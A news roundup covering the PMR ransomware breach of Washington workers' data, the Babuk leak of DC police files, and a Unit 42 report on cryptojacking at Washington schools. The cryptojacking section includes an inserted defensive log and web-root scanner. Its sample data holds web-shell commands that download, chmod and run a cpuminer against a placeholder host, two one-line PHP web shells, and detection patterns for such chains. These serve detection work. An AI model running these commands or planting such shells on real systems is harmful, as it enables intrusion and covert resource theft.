16,000 Washington Workers' Data Exposed Following a Ransomware Attack

Confidential information on more than 16,000 workers may have been exposed in a ransomware attack on the systems of a Renton, Washington market research company.

The Washington State Department of Labor & Industries (L&I) said the attack may have exposed the personal information of thousands of Washington workers.

According to L&I, one of its contractors, Pacific Market Research (PMR), was hit by a ransomware attack on 22 May that encrypted data stored on some of its servers. The data included contact details, claim information, and birth dates for some 16,466 workers who filed workers' compensation claims in 2019.

L&I says the data was provided to PMR so it could conduct a customer service survey. It did not include medical information, Social Security numbers, or bank or credit card numbers.

PMR alerted L&I on 4 June and, according to L&I spokesman Rich Roesler, the department received further details on 9 June. Affected workers and their employers, however, were not notified of the breach until Thursday, almost a month after that first notification.

“It took the company some time to assess the scope of the incident and determine which documents were potentially at risk,” Roesler said. “Once notified, we worked as quickly as possible to arrange for the notifications and set up a call center to respond to detailed questions.” 

L&I says its own computer systems were not compromised in the attack. According to PMR managing director Andrew Rosenkranz, the company hired an independent cybersecurity firm to investigate.

The firm's independent investigation found no evidence that files on the PMR network had been accessed or exfiltrated. PMR says confidential customer data is normally kept encrypted, but the investigation found that the L&I file was not.

“Once this unencrypted file was identified, L&I was immediately notified of the incident,” Rosenkranz wrote. “After accessing the list to conduct the survey, we did not re-encrypt it. That was wholly our error and one for which we accept full responsibility.” 

L&I and PMR are notifying affected workers by mail and offering 12 months of free credit monitoring. PMR says it is paying the notification and credit monitoring costs.

Roesler said L&I was not involved in PMR's ransomware response and that the department's focus is on informing the affected workers.

“We also plan to put our customer experience surveys on hold so we can fully review how our data is protected and whether we can resume these sorts of surveys while keeping customer data safe,” Roesler said. 

According to Rosenkranz, PMR restored its servers entirely from backups and reported the incident to law enforcement.

“We know that malicious cyber-attacks like what we experienced are affecting businesses around the world and governments at all levels,” Rosenkranz wrote. “As a result of the incident, we’ve taken immediate action to harden our network, including implementing additional security measures.”

Washington DC Police Hit by the Worst Ransomware Ever

The police department of the U.S. capital has suffered a massive information leak after refusing to meet the extortion demands of a Russian-speaking ransomware gang, in what experts describe as possibly the most significant ransomware incident to date.

On Thursday, 13 May, the gang, known as Babuk, published thousands of confidential documents from the Washington Metropolitan Police Department on the dark web. A review by The Associated Press found hundreds of police intelligence reports, including information shared by other agencies such as the FBI and the Secret Service.

Ransomware attacks have reached epidemic proportions as international gangs paralyze the computer networks of local and state governments, police departments, hospitals, and private companies, demanding large payments to decrypt data or to withhold stolen information from publication online.

Last week a cyberattack shut down Colonial Pipeline, the nation's largest fuel pipeline, triggering gasoline hoarding and panic buying across parts of the Southeast.

The police data leak is "perhaps the most significant ransomware incident to date" because of the risk it poses to officers and civilians, said Brett Callow, a threat analyst and ransomware specialist at the security firm Emsisoft.

Many of the documents contained security details from other law enforcement agencies relating to the inauguration of President Joe Biden, including a reference to an "embedded source" within a militia group.

One document contained the FBI's analysis of the two pipe bombs left near the offices of the Democratic National Committee and the Republican National Committee before the January 6 riot at the U.S. Capitol. Another described a "big data pull" from cell towers and plans to "analyze purchases" of the Nike shoes worn by a person of interest.

The police department did not immediately respond to a request for comment from the AP, but it had earlier acknowledged that personal data was compromised.

Some of the leaked material exposed personal data from background checks on officers, including past drug use, financial circumstances and, in at least one case, a past sexual assault.

“This is going to send a shock through the law enforcement community throughout the country,” Ted Williams, a former officer at the department who is now a lawyer, told The Associated Press. 

Williams added that the public disclosure of background checks and administrative files makes it harder for officers to do their jobs.

“The more the crooks know about a law enforcement officer, the more the crooks try to use that for their advantage,” he said. 

The Babuk group reportedly demanded $4 million not to publish the files but was offered only about $100,000. The department has not said whether it made that offer. Any such negotiation illustrates the dilemma ransomware creates, with a police department forced to consider paying a criminal gang.

Cryptojacking Spree: Targeting Washington State Educational Institutions

According to a new advisory from Palo Alto Networks' Unit 42 team, cryptojacking attacks have recently been carried out against educational institutions in Washington State. The threat actors are compromising the institutions' networks in order to mine cryptocurrency covertly.

Cryptojacking is a form of attack in which intruders surreptitiously install cryptocurrency-mining software that consumes the victim's computing power while trying to stay unnoticed.

Researchers observed the first attack on February 16: a malicious HTTP request sent to a domain owned by an educational institution. At first it looked like an attempt to exploit a trivial command injection flaw, but it turned out to be a command sent to a web shell backdoor that the attackers used to gain access to the institution's network.

In this kind of attack, the intruders deploy various miner programs to generate cryptocurrencies such as Monero, Litecoin, Bitcoin, and Ethereum. They typically compromise a large number of systems so that the operation yields enough cryptocurrency to be worthwhile.

The researchers say the malicious traffic delivered a UPX-packed build of cpuminer, which was used to mine LTC and BTC.

Once deployed, the backdoor fetches and executes the cryptomining payload. The malware also downloads a mini shell disguised as wp-load.php, the name of a legitimate WordPress bootstrap file. "Since the mini shell is not moved elsewhere, we speculate that the current directory of the mini shell, as well as the backdoor, is a web directory exposed to the internet," the report states.

Cryptocurrency mined on infected systems is sent to two wallets controlled by the operators. Two further incidents differed in their user-agent strings, pass values, and mining algorithms, but the overall attack method was the same.
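The following is an added example (not Unit 42's tooling or the report's own indicators) of how a defender might hunt for the pattern described above: it URL-decodes web-server access-log entries and flags the web shell command parameter, the download-and-run chain, and cpuminer/stratum references while deliberately ignoring the user agent, since that varied between incidents while the delivered command did not; it then scans a web root for PHP files that feed request input straight into eval or a command sink, and for a wp-load.php that has no WordPress configuration beside it. All log lines, file contents, IP addresses, paths and indicator lists are constructed assumptions.

```python
"""Heuristics for the web shell -> cpuminer cryptojacking pattern.

Added illustration, not Unit 42 tooling. All log lines, file contents,
addresses and paths are constructed; the indicator lists are assumptions.
"""
import posixpath
import re
from collections import Counter
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Checked against the URL-decoded request line. The user agent is ignored on
# purpose: it changed between incidents while the delivered command did not.
PAYLOAD_INDICATORS = [
    (r'(?:^|[?&])(?:cmd|exec|command)=', 'web shell command parameter'),
    (r'\b(?:wget|curl)\b[^;|&]*?(?:\||;|&&)\s*(?:sh|bash|chmod)\b', 'download-and-execute chain'),
    (r'\bchmod\s+\+?x\b', 'marks a downloaded file executable'),
    (r'\b(?:cpuminer|minerd|xmrig)\b', 'known miner binary name'),
    (r'stratum\+tcp://', 'mining pool URL'),
    (r'(?:^|\s)(?:-a|--algo)\s*=?\s*(?:scrypt|sha256d|cryptonight)\b', 'miner algorithm flag'),
]
MINER_EVIDENCE = {'known miner binary name', 'mining pool URL', 'miner algorithm flag'}


def classify_request(line):
    """Return (verdict, reasons); verdict is miner-delivery, suspicious, clean or unparsed."""
    m = LOG_RE.match(line)
    if not m:
        return 'unparsed', []
    decoded = unquote_plus(m.group('path'))  # turn '+' and %XX back into shell text
    reasons = [why for pat, why in PAYLOAD_INDICATORS if re.search(pat, decoded, re.I)]
    if MINER_EVIDENCE & set(reasons):
        return 'miner-delivery', reasons
    if reasons:
        return 'suspicious', reasons
    return 'clean', reasons


def analyze_log(lines):
    """Count verdicts over a log and collect the source IPs behind miner deliveries."""
    counts, sources = Counter(), set()
    for line in lines:
        verdict, _ = classify_request(line)
        counts[verdict] += 1
        if verdict == 'miner-delivery':
            sources.add(LOG_RE.match(line).group('ip'))
    return counts, sorted(sources)


# PHP mini-shell signature: request input passed straight to eval or a command
# sink, optionally through base64_decode().
SHELL_SINK_RE = re.compile(
    r'\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*'
    r'(?:base64_decode\s*\(\s*)?\$_(?:GET|POST|REQUEST|COOKIE)\b', re.I)


def scan_web_files(files):
    """files maps path -> PHP source; returns a list of (path, finding).

    A genuine wp-load.php sits in a WordPress root whose wp-config.php is in the
    same directory or one level up; a wp-load.php with neither is a likely decoy.
    """
    config_dirs = {posixpath.dirname(p) for p in files if posixpath.basename(p) == 'wp-config.php'}
    findings = []
    for path, src in files.items():
        if SHELL_SINK_RE.search(src):
            findings.append((path, 'request input reaches an eval/exec sink'))
        d = posixpath.dirname(path)
        if (posixpath.basename(path) == 'wp-load.php'
                and d not in config_dirs and posixpath.dirname(d) not in config_dirs):
            findings.append((path, 'wp-load.php with no wp-config.php beside or above it'))
    return findings


SAMPLE_LOG = [  # constructed; 203.0.113.x and 198.51.100.x are documentation address ranges
    # web shell told to fetch cpuminer, mark it executable and start mining
    '203.0.113.7 - - [16/Feb/2021:10:21:05 +0000] "POST /uploads/index.php?cmd=wget+http%3A%2F%2F'
    '198.51.100.9%2Fcpuminer+-O+%2Ftmp%2Fm%3B+chmod+%2Bx+%2Ftmp%2Fm%3B+%2Ftmp%2Fm+-a+scrypt+-o+'
    'stratum%2Btcp%3A%2F%2F198.51.100.9%3A3333+-p+x HTTP/1.1" 200 14 "-" "Mozilla/5.0"',
    # same chain with a different user agent, pass value and algorithm
    '203.0.113.7 - - [17/Feb/2021:02:03:44 +0000] "POST /uploads/index.php?cmd=curl+-s+http%3A%2F%2F'
    '198.51.100.9%2Fcpuminer+-o+%2Ftmp%2Fm%3B+chmod+%2Bx+%2Ftmp%2Fm%3B+%2Ftmp%2Fm+-a+sha256d+-o+'
    'stratum%2Btcp%3A%2F%2F198.51.100.9%3A3333+-p+edu2 HTTP/1.1" 200 14 "-" "python-requests/2.25"',
    # ordinary page view
    '198.51.100.23 - - [16/Feb/2021:10:22:10 +0000] "GET /news/?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

SAMPLE_WEB_ROOT = {  # constructed file contents
    '/var/www/html/uploads/wp-load.php': '<?php @eval(base64_decode($_POST["p"])); ?>',      # decoy mini shell
    '/var/www/html/uploads/index.php': '<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>',  # backdoor
    '/var/www/html/blog/wp-load.php': '<?php define("ABSPATH", __DIR__ . "/"); require ABSPATH . "wp-settings.php";',
    '/var/www/html/blog/wp-config.php': '<?php define("DB_NAME", "wp");',
}

if __name__ == '__main__':
    for line in SAMPLE_LOG:
        print(classify_request(line))
    print(analyze_log(SAMPLE_LOG))
    for path, finding in scan_web_files(SAMPLE_WEB_ROOT):
        print(path, '->', finding)
```

Both halves key on the payload rather than on the surface features that changed between incidents: the request classifier decodes the query string before matching, so encoding the command does not evade it, and the file scanner looks for the request-to-sink data flow that every mini shell needs, not for a particular filename.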

"The malicious request [...] exhibits several similarities," Unit 42 noted. "It's the same attack pattern delivering the same cpuminer payload against the same industry (education), suggesting it's likely the same perpetrator behind the cryptojacking operation."

An analysis of K-12 schools across the United States, published in March, found that 2020 was a "record-breaking" year for cybersecurity incidents, with more than 400 reported, including ransomware, phishing, website defacement, and denial-of-service (DoS) attacks.